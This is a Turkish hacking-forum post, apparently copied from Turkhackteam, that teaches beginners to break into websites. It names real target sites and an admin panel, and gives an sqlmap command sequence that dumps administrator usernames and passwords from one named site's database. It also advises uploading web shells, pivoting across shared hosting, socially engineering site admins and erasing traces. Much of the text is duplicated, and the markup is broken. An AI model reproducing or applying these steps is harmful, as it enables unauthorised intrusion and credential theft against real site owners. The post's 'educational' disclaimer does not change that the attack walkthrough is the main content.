- 23 Haz 2015
- 58
- 1
MERHABA ARKADAŞLAR BUGÜN SİZLERE HACKER OLMADAN ÖNCE NELER YAPMANIZ GEREKTİĞİNİ ANLATCAM HADİ BAŞLAYALIM :mml:mml
ÖNCELİKLE BÜTÜN ARKADAŞLARIM HACKERLIĞA BAŞLAMADAN ÖNCE PROGRAMLAMA DİLLERİNİ ÖĞRENMELİ GİBİ ŞEYLER YAZIYORLAR BEN BUNA KARŞIYIM BANA KALIRSA HACKERLIĞA BAŞLAMADAN ÖNCE BUNLAR YAPILMALIDIR
1-BİLGİSAYARINIZI KORUMAYA ALIN NASIL MI?
ÖNCE BİLGİSAYARINIZI GİZLEYİN YANİ BAŞKA BİLGİSAYARLARIN SİZİ GÖRMEMESİ İÇİN SİZE BİRŞEYLER YAPILMAMASI İÇİN BİR PROGRAM İP DEĞİŞTİRME PROGRAMLARINDAN BİR TANESİNİ YÜKLEYİN ŞU AN AKLIMDA YOK O YÜZDEN ÖZÜR DİLERİM:RpS_smile:
BUNUN İÇİN SADECE İP GİZLEME PROGRAMLARINA GEREK YOK TABİ BİR ÇOK YOLU VAR MESELA BİLGİSAYARINIZA SANAL BİR MAKİNE KURABİLİRSİNİZ
GEREKEN PROGRAMLAR
-ORACLE VİRTUAL MACHİNE
-İSTEDİĞİNİZ BİR İŞLETİM SİSTEMİNİN İSO DOSYASI
NASIL YAPILDIĞINI GÖRMEK İÇİN LİNKE TIKLAMAN YETERLİ OLUR
https://youtu.be/LGUfa2HIx0E
BUNUNLA SANAL ORTAMDA BİR CASUS GİBİ DOLAŞABİLRİSİNİZ:q :q
SONRA BİLGİSAYARINIZA ANTİVİRÜS PROGRAMLARI ATIN ÖNERDİĞİM PROGRAMLAR AVİRA-COMODO-KASPERSKY-MALVERE VESAİRE VESİAİRE GİBİ PROGRAMLAR YÜKLEYİN AMA DİKKAT EDİN HERKESİN ÖNERDİĞİ PROGRAMI YÜKLEMEYİN BAZEN SİZE VİRÜSLÜ VEYA AZ ÇALIŞAN BİR PROGRAM ÖNEREBİLİR BOŞA VAKİT KAYBI
2-ŞİMDİ ASIL KONUYA GELELİM
BU KONUMUZDA NELER ÖĞRENMENİZ GEREKİR ONLARA BAKALIM AMA ÖNCEDEN BİR HACKERIN AĞZINDAN HACKERLIK DERSLERİNE BAKALIM
https://youtu.be/UdOpLZcSZJY
TABİ BUNU İZLEYİNCE BİZE ÇOK BİŞEY KALMADI AMA DEVAM EDELİM ARKADAŞLAR ŞİMDİ BU VİDEOLARI İZLEYİP UYGULADIKTAN SONRA HEMEN SİTE HACKLEYİM ŞUNU YAPAYIM BUNU YAPAYIM DEMEYİN ÖNCE HACK YAPACAĞINIZ SİTE VE BENZERİ İŞLERİNİZDE ÖNCE O SİTE HAKKINDA BİLGİ TOPLAYIN VE ARDINDAN NASIL HACKLEYECEĞİNİZİN PLANINI YAPIN
ARKADAŞLAR BU YAZI ALINTIDIR KİMDEN ALĞIMI TAM HATIRLAMIYORUM AMA WEBHACK HERALDE NEYSE KONUMUZA DÖNELİM
Temel Saldırı Senaryosu WebHack | Hedef Site Hack Anlatım | THT |
[FONT="][+][/FONT][FONT="] HAVİJİ . [/FONT]
[FONT="][+][/FONT][FONT="] SSS ( SHADOW SECURİTY SCANER ) [/FONT]
[FONT="][+] [/FONT][FONT="]HACKİNG.PL [/FONT]
[FONT="][+][/FONT][FONT="] WEBCRUSİER WWS [/FONT]
[FONT="][+][/FONT][FONT="] ADMİNFİNDER[/FONT]
[FONT="][+][/FONT][FONT="] Acunnetix [/FONT]
[FONT="][+] [/FONT][FONT="]DAHA COK PROGRAM KULLANDIKCA BURAYA EKLEYECEĞİM ŞİMDİLİK AKLIMA BUKADAR GELDİ
[/FONT]
Hedef site işlem basamakları .. //
[FONT="][+][/FONT][FONT="] Dosya tarama [/FONT]
[FONT="][+][/FONT][FONT="] acık tarama [/FONT]
[FONT="][+][/FONT][FONT="] sosyal mühendislik [/FONT]
[FONT="][+][/FONT][FONT="] scripting injection PHP all bug system ( Script tarama ) [/FONT]
Rapor :
[FONT="]
Hedef site[/FONT][FONT="] : http://www.kitefestpasirgudang.com/[/FONT]
[FONT="]Acıklar taranıyor[/FONT][FONT="] : olumlu : Sql [/FONT]
-------------------[FONT="] > : [/FONT][FONT="]olumsuz[/FONT][FONT="] : xss , csrf [/FONT]
------------------- [FONT="]> : [/FONT][FONT="]kullanılabilir[/FONT][FONT="] : sql [/FONT]
------------------- [FONT="]> : [/FONT][FONT="]kullanılamaz[/FONT][FONT="] : xss , csrf [/FONT]
----------- [FONT="]> [/FONT][FONT="]ready [/FONT][FONT="]: é 1 ! : Kullanıldı [/FONT]
Durum analizi : ( Mutlaka yapılmalıdır )
----------- [FONT="]> [/FONT][FONT="]acıklı url[/FONT][FONT="] : Pasir Gudang World Kite Festival[/FONT]
----------- [FONT="]> [/FONT][FONT="]admin paneli [/FONT][FONT="]: http://www.kitefestpasirgudang.com/admin/[/FONT]
[FONT="]>Önemli Not < [/FONT]
[FONT="]1-) Scriptler üzerinde oluşan açıklar ( Zafiyetler ) [/FONT][FONT="]
[/FONT][FONT="]+[/FONT][FONT="]Bildiğiniz gibi scriptler çoğaldıkça bunlarla beraber açıkları da çoğalıyor. Örneğin; Bug Resin WordPressde buldugu XSRF gibi. Bizler bu gibi açıkları milw0rm gibi sitelerden takip etme şansına sahibiz. açık türlerine gelecek olursak farklı farklı sistemlerde farklı farklı dillerde bu tür zafiyettler gündem den gündeme mevcuttur en cok kullanılan sistem linux en cok acık bulunan dil ise php dir aslında en güvenli dil diye adını yaysa bile linux ve php birleşince inanılmaz sonuclar ortaya cıkıyor Scriptlere bakıcak olursak : [/FONT][FONT="]
# Peki script üstünde ne gibi açıklar olabilir ?
[/FONT][FONT="]+ [/FONT][FONT="]Bildiğiniz gibi artık HTMLyi fazla kullanmıyorlar artık rehabet edilen dil ; ASP ve PHP. Hal bu olunca ASP ve PHP de açıklarda artıyor.
[/FONT][FONT="]+ [/FONT][FONT="]Örneğin [/FONT][FONT="]; ASP scriptte SQL İnjection yapılabilir. ( Admin k.adı ve şifresine erişilebilir)
PHP scriptte Remote File İnclude (RFİ) uygulanabilir. ( Servera rahatlıkla girmiş oluruz) ( Yani upload işlemleri )
[/FONT][FONT="]+ [/FONT][FONT="]Tabi bunlar çoğalabilir LFİ - XSRF/CSRF - XST - XSS - XFS - BOF - CJ - PPTS vb. çoğaltmak münkün vede server tipi işletim sistemi değiştikce bu acık türleri filtrelenebilir veya arttırılabilir bu bahsettiklerimiz standartlaşmış acıklardır [/FONT][FONT="]
[/FONT][FONT="]2-) Server Üzerindeki Açıklar[/FONT][FONT="]
[/FONT][FONT="]+[/FONT][FONT="] Evet bir diğer yolumuz ise serverdir. Bildiğiniz üzere her site bir hosta dayanmaktadır.
Örneğin; www.hedef.com sitesi hedefhostingden host almıştır. Fakat serverinde hedef.comdan başka sitelerde olacaktır. http://ipnear.com/results.php?s=www....&submit=Lookup
[/FONT][FONT="]+ [/FONT][FONT="]Bakıyoruz ki serverinde 175 other sites found with IP address: 216.222.193.52 175 site var.
[/FONT][FONT="]+ [/FONT][FONT="]Buda demek oluyor ki server kendinin değil , yani aslında işin kısacası bir sitede o siteye bağlı aynı hostu kullanan yüzlerce site olabilir bunun için siteye shell atmamız veya root olmamız lazım zaten shell atmadan root işlemleri olmaz
ftp bilgisi var ise olabilir ancak oda puttyle
[/FONT][FONT="]
# Bu durumda neler yapabileceğiz ?
[/FONT][FONT="]+ [/FONT][FONT="]Her hangibi bir sitenin açığını bulup shell upload edersek diğer sitelere geçiş yapabiliriz.
[/FONT][FONT="]+ [/FONT][FONT="]Örneğin ; www.winmorkennels.com ( hedef.comun serverindeki bir site)
[/FONT][FONT="]+ [/FONT][FONT="]Bu siteye shell attığımız zaman ( Shell türü fark etmez; r57 - c99 - c100 - cgitelnet vb.) hedef.coma geçme şansımız vardır.
[/FONT][FONT="]+ [/FONT][FONT="]Fakat bazen öyle serverlar oluyor ki shell attığınız dizini dahil göremiyoruz. Permler kapalı rootlayamıyoruz vs. vs.[/FONT][FONT="]o gibi siteler için ise ürettilmiş bypass sheller vardır komut satırı acık olan shellerde ise dizinleri acık hale safe modu off hale getirebiliriz .
[/FONT][FONT="]
[/FONT][FONT="]3-) Port Üzerinden Saldırı[/FONT][FONT="]
[/FONT][FONT="]+ [/FONT][FONT="]Bir diğer yolumuzda portlardır arkadaşlar.
[/FONT][FONT="]+ [/FONT][FONT="]Bildiğiniz gibi NMAP programı site üzerindeki açık portları tarar. Bizim işimize Yarayacak bir portlar ise,
www.milw0rm.com/port.php burada olacak.[/FONT][FONT="]
[/FONT][FONT="]+ [/FONT][FONT="]Eğer uygun exploit(ler) bulunursa rahatlıkla saldırabiliriz.[/FONT][FONT="]
[/FONT][FONT="]4-) Social Engineering[/FONT][FONT="]
[/FONT][FONT="]+ [/FONT][FONT="]Bunu uzun uzadıya anlatmaya gerek yok arkadaşlar;
[/FONT][FONT="]+ [/FONT][FONT="]Sizin hayal gücünüze kalmış bir meseledir. Sitenin yönetici ile itibata geçersiniz ve onu aklınızla yenip şifreleri alırsınız. hayal gücünüz ne kadar geniş olursa sitedeki bilgilere ulaşma sansınız da bir okadar artacaktır örneğin bir siteden whois cekip e mail bilgilerinden adreslere kadar her şeyi öğrenebilirsiniz bu edindiğiniz bilgiler doğrultusunda her türlü yol ile adminimizi kandırabilirz
[/FONT][FONT="]+ [/FONT][FONT="]Bu Şifre alma olayı Domain Hacke kadar gidebilir[/FONT]
EVET ARKADAŞLAR BUNLAR GİBİ KENDİNİZE TAKTİKLER HAZIRLAYIN VE HACKİNİZİ YAPIN BİR ÖRNEK VEREYİM BU VETERAN 7'DEN ALINTIDIR
---------------------------------------------------------------------------------------------------------------------------------------------
cd..
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
cd sqlmap
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
http://www.seaofstories.com/title.php?id=5193'
Fatal error: Call to a member function fetch_assoc() on a non-object in /home/seaofstories/webapps/htdocs/title.php on line 34
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
sqlmap.py -u http://hedefsite.com/sqlinjectionaciklibolum?id= --dbs
sqlmap.py -u Sea of Stories -Book --dbs
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
sqlmap.py -u http://hedefurl.com Veritabanı_Adı --tables
sqlmap.py -u Sea of Stories -Book seaofstories_app --tables
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
sqlmap.py -u http://hedefurl.com -D Veritabanı_Adı -T Tablo_Adı --columns
sqlmap.py -u Sea of Stories -Book -D seaofstories_app -T Administrators --columns
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
sqlmap.py -u http://hedefurl.com -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump
sqlmap.py -u Sea of Stories -Book -D seaofstories_app -T Administrators -C password --dump
Kod:sqlmap.py -u Sea of Stories -Book -D seaofstories_app -T Administrators -C username --dump
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
[FONT="]
[/FONT][FONT="]İntelli Tamper ile site dosyalarını çektiğinizde manuel olarak paneli tespit edebilirsiniz dosyaları dizinleri inceleyerek.[/FONT][FONT="]
[/FONT][FONT="]Gerekebilecek Şeyler[/FONT][FONT="]
[/FONT][FONT="]+ Online panel tarayıcı :[/FONT][FONT="] Fastest Online Admin Panel Finder [/FONT][FONT="]+[/FONT][FONT="]
[/FONT][FONT="]+ İçinde SQL Dork Bulunan Kendi Yapımım Olan Dork Programı : [/FONT][FONT="]Veteran Dork Studio 3
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[FONT="]EĞER BURDAN BİŞEY A[FONT="]NLAMADIYSANIZ LİNKE TIKLAYIN
http://www.turkhackteam.org/web-ser...n-hack-windows-cmd-uzerinden-veteran-7-a.html[/FONT][/FONT]
[/FONT]
PAYLAŞMIMIN ÇOK İŞE YARAMSA DİLEĞİYLE İYİ GÜNLER
[FONT="]NOT=LÜTFEN BİR TEŞEKKÜRÜ ÇOK GÖRMEYİN:RpS_thumbsup: :RpS_thumbsup:
[/FONT]
ÖNCELİKLE BÜTÜN ARKADAŞLARIM HACKERLIĞA BAŞLAMADAN ÖNCE PROGRAMLAMA DİLLERİNİ ÖĞRENMELİ GİBİ ŞEYLER YAZIYORLAR BEN BUNA KARŞIYIM BANA KALIRSA HACKERLIĞA BAŞLAMADAN ÖNCE BUNLAR YAPILMALIDIR
1-BİLGİSAYARINIZI KORUMAYA ALIN NASIL MI?
ÖNCE BİLGİSAYARINIZI GİZLEYİN YANİ BAŞKA BİLGİSAYARLARIN SİZİ GÖRMEMESİ İÇİN SİZE BİRŞEYLER YAPILMAMASI İÇİN BİR PROGRAM İP DEĞİŞTİRME PROGRAMLARINDAN BİR TANESİNİ YÜKLEYİN ŞU AN AKLIMDA YOK O YÜZDEN ÖZÜR DİLERİM:RpS_smile:
BUNUN İÇİN SADECE İP GİZLEME PROGRAMLARINA GEREK YOK TABİ BİR ÇOK YOLU VAR MESELA BİLGİSAYARINIZA SANAL BİR MAKİNE KURABİLİRSİNİZ
GEREKEN PROGRAMLAR
-ORACLE VİRTUAL MACHİNE
-İSTEDİĞİNİZ BİR İŞLETİM SİSTEMİNİN İSO DOSYASI
NASIL YAPILDIĞINI GÖRMEK İÇİN LİNKE TIKLAMAN YETERLİ OLUR
https://youtu.be/LGUfa2HIx0E
BUNUNLA SANAL ORTAMDA BİR CASUS GİBİ DOLAŞABİLRİSİNİZ:q :q
SONRA BİLGİSAYARINIZA ANTİVİRÜS PROGRAMLARI ATIN ÖNERDİĞİM PROGRAMLAR AVİRA-COMODO-KASPERSKY-MALVERE VESAİRE VESİAİRE GİBİ PROGRAMLAR YÜKLEYİN AMA DİKKAT EDİN HERKESİN ÖNERDİĞİ PROGRAMI YÜKLEMEYİN BAZEN SİZE VİRÜSLÜ VEYA AZ ÇALIŞAN BİR PROGRAM ÖNEREBİLİR BOŞA VAKİT KAYBI
2-ŞİMDİ ASIL KONUYA GELELİM
BU KONUMUZDA NELER ÖĞRENMENİZ GEREKİR ONLARA BAKALIM AMA ÖNCEDEN BİR HACKERIN AĞZINDAN HACKERLIK DERSLERİNE BAKALIM
https://youtu.be/UdOpLZcSZJY
TABİ BUNU İZLEYİNCE BİZE ÇOK BİŞEY KALMADI AMA DEVAM EDELİM ARKADAŞLAR ŞİMDİ BU VİDEOLARI İZLEYİP UYGULADIKTAN SONRA HEMEN SİTE HACKLEYİM ŞUNU YAPAYIM BUNU YAPAYIM DEMEYİN ÖNCE HACK YAPACAĞINIZ SİTE VE BENZERİ İŞLERİNİZDE ÖNCE O SİTE HAKKINDA BİLGİ TOPLAYIN VE ARDINDAN NASIL HACKLEYECEĞİNİZİN PLANINI YAPIN
ARKADAŞLAR BU YAZI ALINTIDIR KİMDEN ALĞIMI TAM HATIRLAMIYORUM AMA WEBHACK HERALDE NEYSE KONUMUZA DÖNELİM
Temel Saldırı Senaryosu WebHack | Hedef Site Hack Anlatım | THT |
[FONT="]Merhaba arkadaşlar baslıktada belirttiğim gibi bugun sizlere elimden geldiğince hedef site nasıl hacklenir , site hacklemekteki [/FONT][FONT="]mantık nedir [/FONT][FONT="]? [/FONT][FONT="], nasıl yapılır [/FONT][FONT="]? [/FONT][FONT="], neden yapılır [/FONT][FONT="]? Gibi konuları anlatmaya calıştım videoda kullandığım tüm programları konunun en alt kısmında bulunan linkten indirebilirsiniz öncelikle videomun vede konumun amacını belirtmek isterimki bu konu tamamen Turkhackteam.Net/Org ailesi için hazırlanmıstır vede Tamamen güvenlik amacı ile derlenmiştir .. Selametle // [/FONT]
[FONT="]~[/FONT]-------------------------------------[FONT="]~[/FONT]----------------------------------[FONT="]~[/FONT]
[FONT="]
Öncelikle basit bir anlatım yapmak istiyorum arkadaşlar videomuza geçmeden temel olarak aşamalarımızı vede plan ve işlem basamaklarımızı su sekilde sıralayabiliriz // [/FONT]
Öncelikle basit bir anlatım yapmak istiyorum arkadaşlar videomuza geçmeden temel olarak aşamalarımızı vede plan ve işlem basamaklarımızı su sekilde sıralayabiliriz // [/FONT]
[FONT="]~[/FONT]-------------------------------------[FONT="]~[/FONT]----------------------------------[FONT="]~[/FONT]
[FONT="]
Seneryo : Baslıkları :[/FONT]
Seneryo : Baslıkları :[/FONT]
----
| Veri ToplamaAşaması |
| Saldırı Hazırlık Aşaması |
| Saldırı Aşaması |
| Command Execution |
| Açıklar ve Exploiting |
| Sosyal Mühendislik & Phishing |
| İzleme ve Gizlenme |
| Sistemi Sahiplenme |
| İzleri Silme |
---
[FONT="]Bu başlıklar üzerinden videoda anlatım yapılacaktır arkadaşlar bir sonraki videomda konu başlıkları daha da detayli incelenecektir bu video sadece bir introdur 1 saat 47 dakikaya sığdırabildim ... Ancak [/FONT]
[FONT="]~[/FONT]-------------------------------------[FONT="]~[/FONT]----------------------------------[FONT="]~[/FONT]
| Veri ToplamaAşaması |
| Saldırı Hazırlık Aşaması |
| Saldırı Aşaması |
| Command Execution |
| Açıklar ve Exploiting |
| Sosyal Mühendislik & Phishing |
| İzleme ve Gizlenme |
| Sistemi Sahiplenme |
| İzleri Silme |
---
[FONT="]Bu başlıklar üzerinden videoda anlatım yapılacaktır arkadaşlar bir sonraki videomda konu başlıkları daha da detayli incelenecektir bu video sadece bir introdur 1 saat 47 dakikaya sığdırabildim ... Ancak [/FONT]
[FONT="]~[/FONT]-------------------------------------[FONT="]~[/FONT]----------------------------------[FONT="]~[/FONT]
[FONT="]
Merhabalar .. Bu videoda ... [/FONT]
[FONT="]HedefSite HACK / MANTIĞI / KULLANILAN ARAÇLAR / VEDE HEDEF BİR SİTE HACK / [/FONT]
[FONT="]GİBİ KONULAR ANLATILACAKTIR UMARIM YARARLI BİR VİDEO OLUR / TABİKİDE BANA GÖRE HEDEF SİTE GELEBİLECEĞİNİZ MİZ SON NOKTADIR OYUZDEN BURAYA KADAR GELİRKEN EN AZ BİR :d PHP BİLMENİN VEYA ACIKLAR HAKKINDA BİLGİ SAHİBİ OLMANIN COK FAZLA + SI VARDIR OYUZDEN BU VİDEODAN ÖNCE AÇIKLAR HAKKINDAKİ VİDEOLARI İZLEYİP BU NA GEÇMENİZ SİDDETLE TAVSİYE EDERİM BASİT OLARAK ANLATMAK GEREKİRSE MANTIĞI BİRAZDAN ANLATICAZ AMA ONDAN ÖNCE KULLANILAN MATERYALLER TOOLSLAR HAKKINDA BİLGİ VERECEĞİM [/FONT]
[FONT="]~[/FONT]-------------------------------------[FONT="]~[/FONT]----------------------------------[FONT="]~[/FONT]
Merhabalar .. Bu videoda ... [/FONT]
[FONT="]HedefSite HACK / MANTIĞI / KULLANILAN ARAÇLAR / VEDE HEDEF BİR SİTE HACK / [/FONT]
[FONT="]GİBİ KONULAR ANLATILACAKTIR UMARIM YARARLI BİR VİDEO OLUR / TABİKİDE BANA GÖRE HEDEF SİTE GELEBİLECEĞİNİZ MİZ SON NOKTADIR OYUZDEN BURAYA KADAR GELİRKEN EN AZ BİR :d PHP BİLMENİN VEYA ACIKLAR HAKKINDA BİLGİ SAHİBİ OLMANIN COK FAZLA + SI VARDIR OYUZDEN BU VİDEODAN ÖNCE AÇIKLAR HAKKINDAKİ VİDEOLARI İZLEYİP BU NA GEÇMENİZ SİDDETLE TAVSİYE EDERİM BASİT OLARAK ANLATMAK GEREKİRSE MANTIĞI BİRAZDAN ANLATICAZ AMA ONDAN ÖNCE KULLANILAN MATERYALLER TOOLSLAR HAKKINDA BİLGİ VERECEĞİM [/FONT]
[FONT="]~[/FONT]-------------------------------------[FONT="]~[/FONT]----------------------------------[FONT="]~[/FONT]
Kullanılan Materyaller
[FONT="][+][/FONT][FONT="] HAVİJİ . [/FONT]
[FONT="][+][/FONT][FONT="] SSS ( SHADOW SECURİTY SCANER ) [/FONT]
[FONT="][+] [/FONT][FONT="]HACKİNG.PL [/FONT]
[FONT="][+][/FONT][FONT="] WEBCRUSİER WWS [/FONT]
[FONT="][+][/FONT][FONT="] ADMİNFİNDER[/FONT]
[FONT="][+][/FONT][FONT="] Acunnetix [/FONT]
[FONT="][+] [/FONT][FONT="]DAHA COK PROGRAM KULLANDIKCA BURAYA EKLEYECEĞİM ŞİMDİLİK AKLIMA BUKADAR GELDİ
Hedef site işlem basamakları .. //
[FONT="][+][/FONT][FONT="] Dosya tarama [/FONT]
[FONT="][+][/FONT][FONT="] acık tarama [/FONT]
[FONT="][+][/FONT][FONT="] sosyal mühendislik [/FONT]
[FONT="][+][/FONT][FONT="] scripting injection PHP all bug system ( Script tarama ) [/FONT]
Hedef site bulduktan sonraki aşamalar
[FONT="][+][/FONT][FONT="] Sitedeki dosyaları bulmak Kullanılan program ( acunnetix veya tamper data ) [/FONT]
[FONT="][+] [/FONT][FONT="]sitedeki acıkları bulma ( sql , uplod , xss ) kullanılan program webcruiser ) veya ( acunnetix )[/FONT]
[FONT="][+][/FONT][FONT="] hazırlık [/FONT]
[FONT="][+][/FONT][FONT="] saldırı[/FONT]
[FONT="][+] [/FONT][FONT="]izleri sil [/FONT]
[FONT="][+] [/FONT][FONT="]sitedeki acıkları bulma ( sql , uplod , xss ) kullanılan program webcruiser ) veya ( acunnetix )[/FONT]
[FONT="][+][/FONT][FONT="] hazırlık [/FONT]
[FONT="][+][/FONT][FONT="] saldırı[/FONT]
[FONT="][+] [/FONT][FONT="]izleri sil [/FONT]
Rapor :
[FONT="]
Hedef site[/FONT][FONT="] : http://www.kitefestpasirgudang.com/[/FONT]
[FONT="]Acıklar taranıyor[/FONT][FONT="] : olumlu : Sql [/FONT]
-------------------[FONT="] > : [/FONT][FONT="]olumsuz[/FONT][FONT="] : xss , csrf [/FONT]
------------------- [FONT="]> : [/FONT][FONT="]kullanılabilir[/FONT][FONT="] : sql [/FONT]
------------------- [FONT="]> : [/FONT][FONT="]kullanılamaz[/FONT][FONT="] : xss , csrf [/FONT]
----------- [FONT="]> [/FONT][FONT="]ready [/FONT][FONT="]: é 1 ! : Kullanıldı [/FONT]
[FONT="]^ Gibi bir rapor hazırlanabilir ^[/FONT]
Durum analizi : ( Mutlaka yapılmalıdır )
----------- [FONT="]> [/FONT][FONT="]acıklı url[/FONT][FONT="] : Pasir Gudang World Kite Festival[/FONT]
----------- [FONT="]> [/FONT][FONT="]admin paneli [/FONT][FONT="]: http://www.kitefestpasirgudang.com/admin/[/FONT]
[FONT="]~[/FONT]-------------------------------------[FONT="]~[/FONT]----------------------------------[FONT="]~[/FONT]
[FONT="]>Önemli Not < [/FONT]
[FONT="]
Bu dökümanda verilen bilgiler tamamen eğitim amaçlı olup ,
burada yer alan bilgi veya araçlarla yapılan kötücül faaliyetlerden sunumu hazırlayan sorumlu tutulamaz![/FONT]
[FONT="]Youtube video linki : Temel Saldırı Senaryosu WebHack | Hedef Site Hack Anlatım | THT | - YouTube
~[/FONT]-------------------------------------[FONT="]~[/FONT]----------------------------------[FONT="]~
[/FONT][FONT="]
Hedef Site Hacking Anlatımı ( Videodan Bağımsızdır ) [/FONT]
Bu dökümanda verilen bilgiler tamamen eğitim amaçlı olup ,
burada yer alan bilgi veya araçlarla yapılan kötücül faaliyetlerden sunumu hazırlayan sorumlu tutulamaz![/FONT]
[FONT="]Youtube video linki : Temel Saldırı Senaryosu WebHack | Hedef Site Hack Anlatım | THT | - YouTube
~[/FONT]-------------------------------------[FONT="]~[/FONT]----------------------------------[FONT="]~
[/FONT][FONT="]
Hedef Site Hacking Anlatımı ( Videodan Bağımsızdır ) [/FONT]
[FONT="]1-) Scriptler üzerinde oluşan açıklar ( Zafiyetler ) [/FONT][FONT="]
[/FONT][FONT="]+[/FONT][FONT="]Bildiğiniz gibi scriptler çoğaldıkça bunlarla beraber açıkları da çoğalıyor. Örneğin; Bug Resin WordPressde buldugu XSRF gibi. Bizler bu gibi açıkları milw0rm gibi sitelerden takip etme şansına sahibiz. açık türlerine gelecek olursak farklı farklı sistemlerde farklı farklı dillerde bu tür zafiyettler gündem den gündeme mevcuttur en cok kullanılan sistem linux en cok acık bulunan dil ise php dir aslında en güvenli dil diye adını yaysa bile linux ve php birleşince inanılmaz sonuclar ortaya cıkıyor Scriptlere bakıcak olursak : [/FONT][FONT="]
# Peki script üstünde ne gibi açıklar olabilir ?
[/FONT][FONT="]+ [/FONT][FONT="]Bildiğiniz gibi artık HTMLyi fazla kullanmıyorlar artık rehabet edilen dil ; ASP ve PHP. Hal bu olunca ASP ve PHP de açıklarda artıyor.
[/FONT][FONT="]+ [/FONT][FONT="]Örneğin [/FONT][FONT="]; ASP scriptte SQL İnjection yapılabilir. ( Admin k.adı ve şifresine erişilebilir)
PHP scriptte Remote File İnclude (RFİ) uygulanabilir. ( Servera rahatlıkla girmiş oluruz) ( Yani upload işlemleri )
[/FONT][FONT="]+ [/FONT][FONT="]Tabi bunlar çoğalabilir LFİ - XSRF/CSRF - XST - XSS - XFS - BOF - CJ - PPTS vb. çoğaltmak münkün vede server tipi işletim sistemi değiştikce bu acık türleri filtrelenebilir veya arttırılabilir bu bahsettiklerimiz standartlaşmış acıklardır [/FONT][FONT="]
[/FONT][FONT="]2-) Server Üzerindeki Açıklar[/FONT][FONT="]
[/FONT][FONT="]+[/FONT][FONT="] Evet bir diğer yolumuz ise serverdir. Bildiğiniz üzere her site bir hosta dayanmaktadır.
Örneğin; www.hedef.com sitesi hedefhostingden host almıştır. Fakat serverinde hedef.comdan başka sitelerde olacaktır. http://ipnear.com/results.php?s=www....&submit=Lookup
[/FONT][FONT="]+ [/FONT][FONT="]Bakıyoruz ki serverinde 175 other sites found with IP address: 216.222.193.52 175 site var.
[/FONT][FONT="]+ [/FONT][FONT="]Buda demek oluyor ki server kendinin değil , yani aslında işin kısacası bir sitede o siteye bağlı aynı hostu kullanan yüzlerce site olabilir bunun için siteye shell atmamız veya root olmamız lazım zaten shell atmadan root işlemleri olmaz
# Bu durumda neler yapabileceğiz ?
[/FONT][FONT="]+ [/FONT][FONT="]Her hangibi bir sitenin açığını bulup shell upload edersek diğer sitelere geçiş yapabiliriz.
[/FONT][FONT="]+ [/FONT][FONT="]Örneğin ; www.winmorkennels.com ( hedef.comun serverindeki bir site)
[/FONT][FONT="]+ [/FONT][FONT="]Bu siteye shell attığımız zaman ( Shell türü fark etmez; r57 - c99 - c100 - cgitelnet vb.) hedef.coma geçme şansımız vardır.
[/FONT][FONT="]+ [/FONT][FONT="]Fakat bazen öyle serverlar oluyor ki shell attığınız dizini dahil göremiyoruz. Permler kapalı rootlayamıyoruz vs. vs.[/FONT][FONT="]o gibi siteler için ise ürettilmiş bypass sheller vardır komut satırı acık olan shellerde ise dizinleri acık hale safe modu off hale getirebiliriz .
[/FONT][FONT="]
[/FONT][FONT="]3-) Port Üzerinden Saldırı[/FONT][FONT="]
[/FONT][FONT="]+ [/FONT][FONT="]Bir diğer yolumuzda portlardır arkadaşlar.
[/FONT][FONT="]+ [/FONT][FONT="]Bildiğiniz gibi NMAP programı site üzerindeki açık portları tarar. Bizim işimize Yarayacak bir portlar ise,
www.milw0rm.com/port.php burada olacak.[/FONT][FONT="]
[/FONT][FONT="]+ [/FONT][FONT="]Eğer uygun exploit(ler) bulunursa rahatlıkla saldırabiliriz.[/FONT][FONT="]
[/FONT][FONT="]4-) Social Engineering[/FONT][FONT="]
[/FONT][FONT="]+ [/FONT][FONT="]Bunu uzun uzadıya anlatmaya gerek yok arkadaşlar;
[/FONT][FONT="]+ [/FONT][FONT="]Sizin hayal gücünüze kalmış bir meseledir. Sitenin yönetici ile itibata geçersiniz ve onu aklınızla yenip şifreleri alırsınız. hayal gücünüz ne kadar geniş olursa sitedeki bilgilere ulaşma sansınız da bir okadar artacaktır örneğin bir siteden whois cekip e mail bilgilerinden adreslere kadar her şeyi öğrenebilirsiniz bu edindiğiniz bilgiler doğrultusunda her türlü yol ile adminimizi kandırabilirz
[/FONT][FONT="]+ [/FONT][FONT="]Bu Şifre alma olayı Domain Hacke kadar gidebilir[/FONT]
EVET ARKADAŞLAR BUNLAR GİBİ KENDİNİZE TAKTİKLER HAZIRLAYIN VE HACKİNİZİ YAPIN BİR ÖRNEK VEREYİM BU VETERAN 7'DEN ALINTIDIR
---------------------------------------------------------------------------------------------------------------------------------------------
[FONT="]SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden][/FONT][FONT="]
[/FONT][FONT="]Gerekli Dosyalar & Kurulum[/FONT][FONT="]
[/FONT][FONT="]+ Python 2.7 adlı setup ile Python kuruyoruz +
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) +
+ İntelli Tamper 2.7 adlı program site dosyalarını verir admin paneli bulmak için kullanırız bunu +
+ Safe3 adlı program çok sağlam SQL İnjection taraması yapar sitede +
[/FONT][FONT="]Sorun Yaşayanlar Aşağıdaki Linklerden İndirsin[/FONT][FONT="]
+ sqlmap: automatic SQL injection and database takeover tool +
+ https://www.python.org/download/releases/2.7/ +
[/FONT][FONT="]
Dosyaları İndir [Yandex.Disk 22.6 MB]
Veteran SQLMap Helper(SQLMAP Kod Yardımcısı)
[/FONT][FONT="]SQLMAP'ı CMD İle Çalıştırma[/FONT][FONT="]
[/FONT][FONT="]Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:\" dizinine gelene kadar şu kodu yazalım ; [/FONT]
[/FONT][FONT="]Gerekli Dosyalar & Kurulum[/FONT][FONT="]
[/FONT][FONT="]+ Python 2.7 adlı setup ile Python kuruyoruz +
